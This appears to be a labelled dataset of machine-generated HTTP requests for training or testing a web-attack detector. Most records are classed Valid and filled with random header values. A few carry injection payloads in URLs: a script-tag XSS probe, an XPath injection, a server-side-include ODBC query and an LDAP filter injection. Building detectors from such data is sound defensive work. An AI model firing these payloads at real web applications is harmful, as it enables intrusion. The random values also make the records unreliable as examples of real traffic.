Proxy-Authorization: Digest qop=auth-int
Authorization: tDus rndeoby=anuya
Range: -8,4-,75-7
Referer: /1sre.jsp
TE: gzip
Trailer: TE
User-Agent: Mozilla/9.2 (compatible; Konqueror/2.1; Windows NT; nsahsm; ehfAe9rne1)
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: compress
Upgrade: aDote/0.4, nnlrf/4.3, ecsEa/7.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36624
Start - Id: 7726
class: Valid
POST /zFr3Rt.png? HTTP/1.0
Content-Length: 208
Content-Language: ssc,iuso0,tnee5F
Content-Encoding: deflate
Content-Location: http://www.ghwmatg.uk/Cs1a7/fmeeuto/mCea/m6ohhAei.pl
Content-MD5: ZWU4dWNobml0M2lhb1NJcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Apr 04 18:33:36 CET
Last-Modified: Sun, 24 Oct 04 14:03:05 CET
Host: www.txnd.fr
Connection: close
Accept: text/plain, audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=8309
Client-ip: 217.16.182.224
Cookie: sGNRsYwg7wI0=esnl;mpasswdbz=7378
Cookie2: $Version="5"
Date: Fri, 21 Aug 09 06:27:21 UTC
ETag: W/"f5.i_JBpb@ED-ha3dy"
Expect: lsoebqnj=eEeamdo;biEHtea=yneeSvNH
From: eOtxoh@nrxadyfhr.it
If-Modified-Since: Thu, 19 Jul 07 13:53:48 UTC
If-Unmodified-Since: Thu, 07 Jan 10 07:46:20 UTC
If-Match: "lWv0wz7@9QWomY4X0"
If-None-Match: "eRICX5xaScYluGu"
If-Range: *
Max-Forwards: 94
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic c2pvY0RoYzplbmR3ZWw5
Authorization: Digest username="eiepts"
Range: 408895-516542
Referer: /En1Tn/oHtbsno/rsCSe/tlesSn.jpg
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 6.8; 8D-yu; rv:2.3.1) Gecko/65667175
UA-CPU: Sparc
UA-Disp: 230,315,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 297x5012
Via: HTTP/7.3 www.c7eo.htm, HTTP/9.8 www.s1cae.tiff:8329
Transfer-Encoding: identity
Upgrade: a9e/4.2, 4ua/9.3, aTdqap/1.3, aArsl/9.2, ion9/7.3
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 575043034
----: ------------------------
~~~~~: ~~~~~~~~~~~

8d2=ryiea&ao2eEh=8r&ss=27&K%u7rWPj=u&knoi=7&Ainsert7B-8jZR=sr5onuyeosen7kt&e1ehysa0kdrww=v&eHbfdtiiteSap=354921&jscm8e=0ss&rhty5=6269&ahe2oEbd9maeloa=eyjPeY8&drraeamtm4iaEk=Zrewshutdowni&ongf0rged=aceuhEi%2Bi

End - Id: 7726
Start - Id: 11333
class: Valid
GET /oeoacEjtetecayn9io7/oF043Pm6F9VAhO/WreAjuf6documentve/ma/r_xaynuNm/oqS1ZHcHkf9l4zTNqd/mRm/dj0tcMRBMRf8TF/ptnaMAoitvltE8y/nf8azw0FGUFBv27yZLdN/gfvr5n/pasD.shtml? HTTP/1.1
Host: www.ojs1T7jAr.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.7, identity;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 131.29.29.182
Cookie: -ZDE0VivFO7tmp=eaemshn;etluai;o3t8=ru eg1vhomescript;ueuov8o=5
Cookie2: $Version="8"
Date: Fri, 30 Jun 06 15:55:42 UTC
ETag: "qPpQy3DD3HOBJmaOY1"
Expect: tnrs=resh;eeatour=aTDhmbR
From: e4dstofs@pnO7e.be
If-Modified-Since: Sat, 30 Jan 10 21:35:37 GMT
If-Unmodified-Since: Wed, 28 Jan 09 02:24:24 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Apr 06 11:42:28 CET
Max-Forwards: 88
MIME-Version: 3.0
Pragma: lbe0r=edmntre
Proxy-Authorization: Digest opaque="ei6e3ho"
Authorization: Basic bmVlcm8ydDphaXR1b3U=
Range: 9-,461-4858
Referer: /mSt5/ianpsRy/rlneli.asmx
TE: trailers,gzip,deflate;q=0.2
Trailer: Proxy-Authorization
User-Agent: xCixAG http://www.eaaoWu.net
UA-CPU: x86
UA-Disp: 139,6791,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 953x845
Via: HTTP/9.7 126.133.228.108:87, 4.6 212.224.192.162
Transfer-Encoding: eoOddT; netshmt=9s5Uea
Upgrade: ax5/0.6
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 7492268797432274
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11333
Start - Id: 46497
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.0
Host: www.bidoaEse.com
Connection: keep-alive
Accept: audio/basic;q=0.3, application/zip;q=0.7, text/*;q=0.7
Accept-Charset: windows-874;q=0.3
Accept-Encoding: compress, compress, compress, compress;q=0.7
Accept-Language: *
Cache-Control: max-age=43417
Client-ip: 219.134.80.54
Cookie: at4a=93;0-esystem-vkincludeC=239;h3uneiOrir=H-%
Cookie2: $Version="5"
Date: Tue, 06 Mar 07 17:02:13 CET
ETag: W/"3BFM3KufvfBTZLQLS"
Expect: ninwdknn
From: musoa@e4qteeenfg.net
If-Modified-Since: Thu, 26 Oct 06 04:35:25 GMT
If-Unmodified-Since: Sat, 23 Feb 08 14:10:27 UTC
If-Match: *
If-None-Match: *
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 723
Pragma: ofewdi5e='hceanw'
Proxy-Authorization: Digest qop=auth-int
Authorization: nmrxce g3oyi=r4te
Range: 8-112855,2026-165541
Referer: http://www.oebch.fr/AnDye.msf
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 4.4; ic-ce; rv:9.4.1) Gecko/49306650
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 7ivmxe/2.5 www.6amie7.png, 7.5 www.antnn.gif, otrygw/7.4 122.239.150.30
Transfer-Encoding: otsn; troe=con6a
Upgrade: us6nre/1.5
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46497
Start - Id: 31702
class: Valid
GET /execyzsI/d4_gtetgAd.jpg?aeedtomyrruec=te5lq%28ati59piqchotx&-5BS=8&esx=rsiaenSgeeddh&snoannotl6lO3T=37&ooi39dgeatl=6680170073&ometttieiegj=9&fcbaaoiIbasrqxh=acopy%7ErSepAlua&bloat=oA+%26m HTTP/1.0
Host: www.yeeaz.com
Connection: cneiswn
Accept: image/jpeg, image/gif, text/xml;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 68.24.118.237
Cookie: nsoey5Re1=neetr;wsiiaroaee5e=mfwO2UC.ris2
Cookie2: $Version="8"
Date: Fri, 18 May 07 14:44:25 CET
ETag: W/"EOB88VYvKs@7B@.m"
Expect: 100-continue
From: rKtsre@uhAOD.com
If-Modified-Since: Thu, 04 May 06 21:32:41 CET
If-Unmodified-Since: Tue, 03 Oct 06 24:36:55 UTC
If-Match: *
If-None-Match: ".cWg7yheuvYY3rkr"
If-Range: "C1zEclAR_BY-yjX"
Max-Forwards: 500
MIME-Version: 2.9
Pragma: ncjsnasn='is9r'
Proxy-Authorization: NTLM Y29lcmxVZXdzWGlvVHZrY29OMGxtZWlvZWFlcnNyc0ZlZWVpcm9wcQ==
Authorization: Digest uri=http://www.pspgR.st/tu2u/gnNm0t.avi
Range: 8-
Referer: /3ntuxd.png
TE: chunked;q=0.6
Trailer: TE
User-Agent: 528ve6os http://www.4edg.fr
UA-CPU: PowerPC
UA-Disp: 029,5765,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9430x7643
Via: FTP/9.1 221.244.165.66
Transfer-Encoding: identity
Upgrade: c2e/7.5, L8cezt/0.9
Warning: 582 63.98.99.8 "lare9ilntstaLhew" "Tue, 29 Nov 05 02:58:50 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 90134237521191583
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31702
Start - Id: 2507
class: Valid
GET /qsHHCQ1Aaprocessing-instructionw/f6b6sh98u1EpmaZn./oHv9KYNttLWc1Kk/We2rwAtnedt/ielergj/erWohsprs/dDwcatRK-U-Oxltelnet/iSzioibspssfrth9S/owEo2lweMgQ4.fhO/gE/meitdOydbso/l0GaV6i_Zat.cfm? HTTP/1.0
Host: 251.224.248.66
Connection: close
Accept: video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ea-traoaiOd;q=0.6, elalny-netern, icqbaix-yam
Cache-Control: Rctifc7i=s
Client-ip: 133.213.21.221
Cookie: i7b=owrTteigaSSUskgb;Tn3oneh6thueso=stY;ahsr9sm=08T.T19NQGs;ehdslize=0674840339;sOeeg6cvamildeh=%;te=cuhr:
Cookie2: $Version="469"
Date: Fri, 15 Jul 05 06:53:52 GMT
ETag: ".0IQSDbyQeVX9Up"
Expect: 100-continue
From: rirqcm1t@elnde8hi.ch
If-Modified-Since: Sat, 19 Sep 09 14:44:57 GMT
If-Unmodified-Since: Wed, 20 Apr 05 08:04:21 UTC
If-Match: "Yh5cFRIDkfd-fo4YAX"
If-None-Match: *
If-Range: Fri, 17 Sep 04 19:43:11 GMT
Max-Forwards: 76
MIME-Version: 7.0
Pragma: hn4=i1qNas
Proxy-Authorization: WbSIb lsbuJu=r4rr
Authorization: Basic dXNlZXJ1OmNtaGk0cg==
Range: 32-6,-041504
Referer: /iuwnu/oockdi/duh1gret/4ebsfnsy.avi
TE: trailers
Trailer: Trailer
User-Agent: tefp (rCf20sNCdW; oLSA25; 4uu.P-uaZK; bpJchP; mm58Viuqy4)
UA-CPU: x86
UA-Disp: 5722,6200,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 831x8702
Via: FTP/9.5 128.50.155.165, 7.3 www.emhgh.htm
Transfer-Encoding: compress
Upgrade: m50ll/0.0, a5sim/2.2, yic0t3/9.0
Warning: 578 32.112.151.202 "e3rhaoteaatecc" 
X-Forwarded-For: 183.107.89.121
X-Serial-Number: 347745233258688600
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2507
Start - Id: 48913
class: XPathInjection
GET /aJNSQynKZ/4XelqH3Wadmin/tFU@7LfuVV25KZ@aFiPl/hIeTV.mspx?os=14++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++00539%3D&mtshrAT8awAkse=776155&eaf=70850489&esmgaisgno6Wsrc=4152172855&nelacl1Es0E=twyhreeroEn HTTP/1.0
Host: 225.55.150.116
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 9wX0p-g, TOlGti8-7ns8de4f
Cache-Control: ias0fi='h4'
Client-ip: 162.33.169.39
Cookie: sa=rsree9stnDsEeedfI;ilX=4
Cookie2: $Version="504"
Date: Fri, 06 May 05 19:01:07 GMT
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: alsrgDt=Ugteta;eyxh2
From: nui8@hgERemx.net
If-Modified-Since: Fri, 06 Aug 04 01:19:57 UTC
If-Unmodified-Since: Sun, 12 Jun 05 19:26:37 GMT
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: "Mx5c7grfboP61gEoTKpR"
If-Range: Tue, 03 Mar 09 17:52:06 GMT
Max-Forwards: 2362
MIME-Version: 0.9
Pragma: IEonpgr='Sico'
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: Digest cnonce="dRpveie"
Range: 87-22
Referer: /ShuWqii/iynHnI9h.txt
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: aeonatesO (ozQGwA8_P5; 9q2s8E)
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3997x7266
Via: eui0p/8.9 www.0mc9i.jpeg, 5.3 74.108.160.93:96
Transfer-Encoding: gzip
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 566436568089581
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48913
Start - Id: 25642
class: Valid
GET /optw.hChlMmailJ4/tneecaeahmoapru3u0.exe?uTi=DoeCmnrhhoncjhts&t4cieporasesi=oFO_QpViGV&hdl1o=a9newg&tedelt=itjb5_OUf&yehiorier=03636&dgo=l&iD=8432&MwDJscriptSP4=%40Dtsnr+An6&nvmniregihai1Ar=aTiuKytMG9q3&oir1takt=anrsoh6f%25&TqTLb=oiootkTrn HTTP/1.1
Host: www.odrO.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: nb-A
Cache-Control: max-age=47
Client-ip: 94.156.110.119
Cookie: tfggmgwjptdp=6113053784;yEtdrterz=;e2~xo
Cookie2: $Version="0"
Date: Fri, 24 Nov 06 14:06:17 GMT
ETag: "noKR59xcRNNh74ETp4v"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sat, 26 Jun 04 02:18:39 CET
If-Unmodified-Since: Thu, 07 Aug 08 06:13:19 UTC
If-Match: "4XUpt.ehLH1kbk4U45tP"
If-None-Match: *
If-Range: Fri, 20 Feb 09 08:35:17 CET
Max-Forwards: 2
MIME-Version: 2.8
Pragma: eHda='ysSlsnnr'
Proxy-Authorization: Digest nonce
Authorization: settb cnaa=ndr4
Range: 63869-90
Referer: http://e80iEme.gov/Lhy8or/HreBrm/qIhie.js
TE: deflate;q=0.6,trailers,gzip
Trailer: Pragma
User-Agent: TevkeAeXapaods
UA-CPU: 68000
UA-Disp: 841,3299,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 143x5340
Via: 3.4 www.nocrxe.png:53301
Transfer-Encoding: deflate
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25642
Start - Id: 40931
class: SSI
GET /d6z1J3ZSMiVgVsL-Ck5I.php4?eshN3iAauen2y=48clnhdaclcuEb&QcbetweenckLRsUM=%3C%21--+%23odbc+++++connect%3D%22Axk%2Clre8%2CypaeT%22++++statement%3D%22select+++++*+++from++0w%22--%3E&dteotEnett=wZPK3%40qv HTTP/1.0
Host: www.enIaitqai.net:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: 95Dortst-eoasuTj;q=0.6
Cache-Control: no-transform
Client-ip: 39.139.56.104
Cookie: yi1liqelnerqs=h;_YX1=6nIY;r5=cvvneryycxivarallo 
Cookie2: $Version="8"
Date: Fri, 02 Mar 07 10:06:48 GMT
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: 100-continue
From: ioOee@owoeu.be
If-Modified-Since: Thu, 01 May 08 07:09:52 UTC
If-Unmodified-Since: Tue, 10 Mar 09 14:40:09 UTC
If-Match: "Svt2Q4J_TZFRvsTjW9uI"
If-None-Match: "KuRGUl3W9M9r9trBF"
If-Range: Sat, 18 Oct 08 01:59:32 GMT
Max-Forwards: 2
MIME-Version: 7.1
Pragma: neshaEiN=ss
Proxy-Authorization: Basic bGVKc3d0OndWMGU=
Authorization: Basic Q2VldXhlaTplbHRz
Range: -25
Referer: http://www.0erab8.de/daaq1n/rbenhe.gif
TE: trailers,trailers,deflate
Trailer: Upgrade
User-Agent: Mozilla/9.5 (compatible; Konqueror/1.8; Open BSD i386; dvc2e2Eh; axat5tD)
UA-CPU: 68000
UA-Disp: 661,5118,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4871x5124
Via: FTP/2.0 www.Rhatdk.html, Tkna/5.7 168.109.198.131, bzancl/3.2 www.mhet.gif
Transfer-Encoding: ainu; Naowi7=1iAw
Upgrade: shl4/2.2, R9dsdr/8.5, ihigLd/0.8, nnde/9.9
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40931
Start - Id: 38620
class: LdapInjection
GET /txPsn/aEh/5tvofoU/zV9vs/lz/f92vHNuEXRKO/qR.0dcCz/s6gz-hKtC4ZFE.oI/trXyJlXuj.gif?e5=aoo%29%28+%7C+%28hooi%3D*%29 HTTP/1.0
Host: www.gsf2.biz
Connection: keep-alive
Accept: video/*;q=0.1, text/html;q=0.3
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, compress, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 54.188.209.237
Cookie: C6H0is=aLEiexectt/prLctmp;ve2mto=3a;tei3Y3mcms=t3etn0icpg;jc98odu=r0o-kt8nw8likeinnacE
Cookie2: $Version="244"
Date: Sun, 19 Jul 09 15:04:52 CET
ETag: W/"78VQV6Gzdd4iSe."
Expect: 100-continue
From: hlpn3e9@tbllex.fr
If-Modified-Since: Sat, 22 May 04 14:05:09 GMT
If-Unmodified-Since: Tue, 02 Oct 07 15:54:54 UTC
If-Match: *
If-None-Match: "sjSn5qbZ3i5NKpNA"
If-Range: "2nrs__Eu2QeAlWIfe7Y"
Max-Forwards: 5
MIME-Version: 0.3
Pragma: hre=a8tkfii
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: n79iy LycOoh=2diisb
Range: 66206-063
Referer: /fx2ci1Ao/smuar1s/saaeaifi/danw/tgomceS.jpeg
TE: trailers,trailers
Trailer: If-Range
User-Agent: ezdiAIohdS/2.9.7
UA-CPU: x86
UA-Disp: 6369,756,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: HTTP/1.6 58.166.3.169:923
Transfer-Encoding: identity
Upgrade: rpeyc/9.4, l7e/9.7, Ouhf/0.7, rzONo/2.0
Warning: 221 www.yahrm.jpeg "dsaeopr0wq2uo" "Thu, 14 Jul 05 01:23:19 CET"
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38620
Start - Id: 31910
class: Valid
GET /iaheaaumthfe5addtcse/jDUAVhtpass4sY/rE/8u9.bin?d9oyb4idRfas=i9gnBhBk0C&antvuoneEoaCwpt=homestmetall%3DeiLj+object6&2vuvr=%5Br HTTP/1.0
Host: 160.194.101.145
Connection: e9cus
Accept: text/xml;q=0.4, video/quicktime, image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, gzip;q=0.2
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 113.198.226.245
Cookie: DiK4EVWVO@r=uInhoxnt8izoajc;nsheni=+nndnodeno ;ashlneitio=1HeeroeresejE;Eo4e=eo2auwGctete
Cookie2: $Version="417"
Date: Mon, 07 Feb 05 02:45:17 UTC
ETag: W/"SG5jVQyCNQRd8S."
Expect: 100-continue
From: haeoa@filcnbidra.net
If-Modified-Since: Sat, 10 Apr 10 14:59:03 UTC
If-Unmodified-Since: Sun, 13 Jan 08 22:13:51 GMT
If-Match: "KyQXLwyBkzV3xoWJpJi9"
If-None-Match: *
If-Range: *
Max-Forwards: 755
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM OGF1ZHRDNktlczh1MG9kZWhoa05kYnR0TmFzODduaHJxZ2lmaGk2YXQ2ZWRs
Authorization: Digest response="e51FfCe45aB8a5ADbEe840Fcbf2Ec079"
Range: 581-,06-0,27-
Referer: http://aRol6qa.fr/hA7e/rNyhe/yutri/ateaai.asmx
TE: deflate,chunked;q=0.3,chunked
Trailer: Expect
User-Agent: Mozilla/4.4 (X11; U; Solaris 1.5; ra-dm; rv:7.9.8) Gecko/76093336
UA-CPU: MIPS
UA-Disp: 280,3333,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 049x223
Via: 8.4 www.Ieee.js, 2.4 133.231.35.121:81747, 5h3m/5.5 138.138.34.102
Transfer-Encoding: gzip
Upgrade: deed/5.3, c0CrpY/3.4
Warning: 407 69.33.215.161 "o6rodhfern" "Thu, 26 Oct 06 21:59:01 GMT"
X-Forwarded-For: 163.91.80.203
X-Serial-Number: 643504609
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31910
Start - Id: 25746
class: Valid
GET /wrxeteeodwijahunR/iv6b-wSe/cxtermkKo/3LH@h5/tazliDggcfi/Goeval.qA8lMl1andOO/rKE7OKj2T6kVWxqv/gp8qGW/gyani/S_Nj-jP/hrlcinuCblWele8bouu.jpg?yn8l8kzi=31&aatt2im=o5u2vY1Y&eoe2fwet3rarmoe=2015546523&dowgeeu=038545729&ezjtvlg=97888&fa=nsto2a8&anyeO3chiZ=tU8W.bj&t3nshu=tenotohLc&Pn1stdinXFMHkRF=8no1iegae2psNssnit&2Do0havingwp-6JGP=ov4 HTTP/1.1
Host: 243.80.147.125
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 231.14.230.156
Cookie: iagvttrr4oe=97829;sdg=ah;UxtCs7tue=08907147;eto=nqaYUh;SnnErlda=7418448;esrtetrhoe=2124767
Cookie2: $Version="38"
Date: Fri, 17 Feb 06 04:44:36 CET
ETag: W/"Hd49XJxD5aG5izO-T"
Expect: 100-continue
From: Aboesy@tnEn1d.uk
If-Modified-Since: Wed, 20 Oct 04 11:03:57 GMT
If-Unmodified-Since: Fri, 06 Aug 04 23:39:44 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4772
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aW5paHQ6ZW5uOQ==
Authorization: Digest opaque="b4hpoaar"
Range: 03-
Referer: /nuhdem.exe
TE: gzip;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/1.5 (compatible; Konqueror/3.8; Solaris; zlgcye; siec)
UA-CPU: PowerPC
UA-Disp: 7894,3200,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7472x595
Via: FTP/7.1 www.oldaa.jpg
Transfer-Encoding: gzip
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 635 www.9ejeStqe.htm "8o9arHalg5mnumiio9o" "Sat, 25 Oct 08 24:03:25 UTC"
X-Forwarded-For: 1.21.31.218
X-Serial-Number: 960628745817709
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25746
Start - Id: 32988
class: Valid
POST /jutrr/hu/etomtilNR/hE390VM7eGA1W.bin? HTTP/1.0
Content-Length: 23
Content-Language: T7egHe,eXrtu,Ilef
Content-Encoding: deflate
Content-Location: http://nrlndna.net/wsue8ra/9tyDnln/aierg/altst1r.dll
Content-MD5: bEg2clVlbU9wVEFObGZFbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Aug 04 11:38:25 UTC
Last-Modified: Tue, 07 Jul 09 20:58:18 GMT
Host: www.hinetl.fr
Connection: iscedy
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: 3t2-h7dhMr, djtdakn-ln, cdecic-r;q=0.0
Cache-Control: max-age=55885
Client-ip: 59.189.132.168
Cookie: tdivOU4M7HE=SnyovlahemtneOokl;X2KmXREOyimg=oe%uw9vfa;bSwm9tmu1iechta=e9rvT;sock_streamf6HvO3K3=0658235;alt=600
Cookie2: $Version="812"
Date: Sun, 18 Apr 10 07:27:00 GMT
ETag: W/"ivkb-HZBwJXpc7uGkpG"
Expect: 100-continue
From: nxhoo@luihsl.gov
If-Modified-Since: Wed, 08 Apr 09 14:07:26 CET
If-Unmodified-Since: Thu, 07 Feb 08 09:59:40 UTC
If-Match: "AAKZwIwut_aQIT-Pras"
If-None-Match: "78D2AQwrO6.0R7ADD58"
If-Range: Fri, 19 Dec 08 19:14:42 UTC
Max-Forwards: 9
MIME-Version: 1.9
Pragma: nhewwN=fCtnal
Proxy-Authorization: hhFHT hdinre=f4edi9s
Authorization: Digest nonce
Range: 030-05545,617-,-53
Referer: http://www.u0jHer.cz/eitngf/s1e3bhii/dttp6.aspx
TE: trailers,chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: ideis (v5RsBCGAzV; ofewbSl2EH; uj5U_hffI)
UA-CPU: MIPS
UA-Disp: 8787,462,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 596x2213
Via: ieOsy/5.8 203.70.53.22
Transfer-Encoding: compress
Upgrade: seoh/4.5, k3f0q/5.1
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 75673085046625
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iYlslFb86a=nAz&Aeecy=hO

End - Id: 32988
Start - Id: 7351
class: Valid
PUT /derkcggE.swf? HTTP/1.1
Content-Length: 78
Content-Language: pdok,naaa8ac,mrs6ue
Content-Encoding: identity
Content-Location: /ta4b8a/wwsnNs.pl
Content-MD5: YW10d29lYW95cGE3NmR4dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Jun 05 10:18:47 UTC
Last-Modified: Thu, 02 Jul 09 01:29:10 CET
Host: www.epaxita.biz
Connection: keep-alive
Accept: image/gif, text/*, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 88Atns-yeIa;q=0.8, d17aHjCe-o;q=0.8, rS2lnyis-Gte;q=0.2, ernTSlc-fpnoy8nt
Cache-Control: no-transform
Client-ip: 127.183.145.17
Cookie: FDidafOrGanull=06345414
Cookie2: $Version="61"
Date: Fri, 04 Jan 08 20:40:40 UTC
ETag: W/"K2hh28-cPpD.YzagC"
Expect: 100-continue
From: paelsta@Bijzxj.uk
If-Modified-Since: Sat, 06 Feb 10 22:29:50 CET
If-Unmodified-Since: Sun, 20 Feb 05 05:35:05 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Oct 05 14:44:42 GMT
Max-Forwards: 93
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: r5it7 xtlcz=Plhl65g5
Authorization: NTLM ZGxlcmRzZVBub2JyZjVudjQ2bHRuYm1pcnNhdHNuMGFoYw==
Range: 16991-,-9775,-255
Referer: /begM/1iwhiai/96a3/6dEtts.tiff
TE: trailers,deflate;q=0.6,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.9 (Windows; U; Win98 9.1; as-eO; rv:4.8.0) Gecko/25878832
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 965x983
Via: 5.4 www.e1gs0q.png, po7qti/5.2 238.7.87.251:84, FTP/9.1 212.242.15.228
Transfer-Encoding: m6ae
Upgrade: SotzF/5.2, 0easi/1.1
Warning: 102 www.baEeoPim.jpeg "sohwlnnjrcR" 
X-Forwarded-For: 181.117.178.72
X-Serial-Number: 33978029627174385263
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

neaumNelel=08114&fd=622&doi9hr=lPBZU5ZUA-&tersRDetitiafa=02659&hrftedr=gtI|n

End - Id: 7351
Start - Id: 22398
class: Valid
GET /sissrdooia7lnht/4KDrb-vXDtxD/hsFVff1PLy/afs1ths/r9@GQFcbLqI/ixgaBsvd78u_daeMz/g@P.mdb?QiaeoraEwprtssk=81343467&thnmrkn=e0rmthaeforqry&Smyyyfdmi=-2nhh%3F%402eecniest63am&o65shbyseeHdon=IrnyoLgbt+svitt&irrkrdileOc=886033&lrTz0nnnneTefid=%27e&0d-GVxtermv3=dpoVNupD4&lttb5enUiThkwa=thn7ieex&tFnrra=41&ST4ta=48047&lsklondgocMogcv=qnosfbqT5e&ttug=5645 HTTP/1.1
Host: 1.181.91.233
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.8, gb2312;q=0.7, windows-1253;q=0.5, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: hlR-ehr
Cache-Control: max-age=97680
Client-ip: 243.52.144.44
Cookie: titdirnw5nccnmn=5@t+t:Xaoedn
Cookie2: $Version="985"
Date: Sat, 01 Oct 05 22:48:51 UTC
